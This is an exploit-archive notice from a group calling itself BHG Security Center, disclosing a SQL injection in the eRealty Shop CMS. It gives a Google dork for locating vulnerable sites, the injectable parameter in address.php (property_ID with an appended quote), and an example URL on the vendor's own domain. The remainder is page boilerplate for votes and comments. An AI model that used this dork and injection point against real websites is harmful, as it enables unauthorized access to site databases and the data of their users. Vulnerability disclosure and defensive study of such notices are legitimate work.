eRealty Shop SQL Injection

2012.04.28

Credit: BHG Security Center

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

####################################################################
# Exploit Title: eRealty SHop SQL Injection
# Google Dork: "The eRealty Shop, Inc. All rights reserved."
# Date: 27/04/2012
# Author: #BHG Security Center
# H0me : www.black-hg.org <http://www.secure-land.net/>
# Software Link: www.theerealtyshop.com
# Version: last version
# Tested on: Linux/Ubuntu - Windows7
# CVE : none
####################################################################
# p0c :
#
# address.php?property_ID=234'
# The CMS Have SQL Injection in address.php ;)
####################################################################
# exmample :
# http://www.theerealtyshop.com/address.php?property_ID=234'
####################################################################
# Special Thanks To : Net.Edit0r - A.Cr0x - 3H34N & ....
####################################################################
# GreetZ : Mikili - 2MzRp - 0x0ptim0us and all of SecureLand Members.

References:

http://www.black-hg.org/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

eRealty Shop SQL Injection

Dork: \"The eRealty Shop, Inc. All rights reserved.\"

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.